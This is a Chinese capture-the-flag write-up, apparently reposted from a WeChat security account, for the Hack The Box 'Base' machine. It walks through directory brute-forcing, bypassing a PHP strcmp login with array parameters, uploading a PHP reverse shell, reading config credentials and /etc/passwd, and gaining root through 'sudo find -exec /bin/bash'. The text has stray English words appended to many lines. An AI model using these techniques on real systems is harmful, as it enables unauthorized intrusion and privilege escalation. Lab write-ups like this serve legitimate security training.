HTB靶機-base實戰分享

文章源自【字節脈搏社區】-字節脈搏實驗室 php

做者-whithtml

掃描下方二維碼進入社區python

以後準備長期更新HTB系列,由易到難,開了VIP,全部靶機的思路都會更新,讓你們儘量多的學習到挖洞技巧,請你們持續關注我們的微信公衆號,字節脈搏實驗室。linux

首先掃描開放端口和服務。web

nmap -A -v 10.10.10.48shell

能夠看到開放端口是22和80,機器是linux的。瀏覽器

打開80端口對應的網站應用:安全

先上工具掃一波目錄:python3 dirsearch.py -u http://10.10.10.48 -e *bash

gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirb/big.txt服務器

爆破獲得有用的目錄爲:_uploaded  login

直接訪問:http://10.10.10.48/login/

目錄配置錯誤,能夠直接列出。

在登陸文件夾中,咱們能夠看到login.php.swp。在Web服務器上就地編輯文件的狀況並很多見,若是未適當關閉文件,NanoVim等編輯器將建立臨時文件。咱們能夠下載.swp文件,並查看login.php使用strings命令的源代碼。

Web服務器正在使用strcmp來檢查用戶名和密碼,這是不安全的,能夠輕鬆地繞開。讓咱們打開burp並捕獲登陸請求。如下代碼存在問題:

if (strcmp($password, $_POST['password']) == 0) {

if (strcmp($username , $_POST['username']) == 0) {

Burp捕捉登錄請求,修改post的參數爲:username[]=admin&password[]=admin

順利登錄:

上傳kali自帶的php shell:/usr/share/webshells/php/php-reverse-shell.php

上傳以後沒文件路徑,加上以前掃描出來的目錄,瀏覽器訪問執行,本地監聽:http://10.10.10.48/_uploaded/php-reverse-shell.php

看一下web的配置文件:cat /var/www/html/login/config.php

<?php

$username = 「admin」;

$password = 「thisisaxxxxpassword」;

咱們還能夠閱讀/etc/passwd以找到用戶名john。結合這兩個。讓咱們升級到pty shell。

python -c 'import pty; pty.spawn(「/bin/bash」)'

su jhon

拿到user.txt

sudo -l

看來咱們能夠將find做爲sudo 運行。

sudo /usr/bin/find /etc -exec /bin/bash \;

拿到root.txt

 

剛開始分享一個比較基礎的靶機,以後會從慢慢深刻。長期更新,記得追更哦。

通知!

公衆號招募文章投稿小夥伴啦!只要你有技術有想法要分享給更多的朋友,就能夠參與到咱們的投稿計劃當中哦~感興趣的朋友公衆號首頁菜單欄點擊【商務合做-我要投稿】便可。期待你們的參與~

記得掃碼

關注咱們哦

本文分享自微信公衆號 - WhITECat安全團隊(WhITECat_007)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索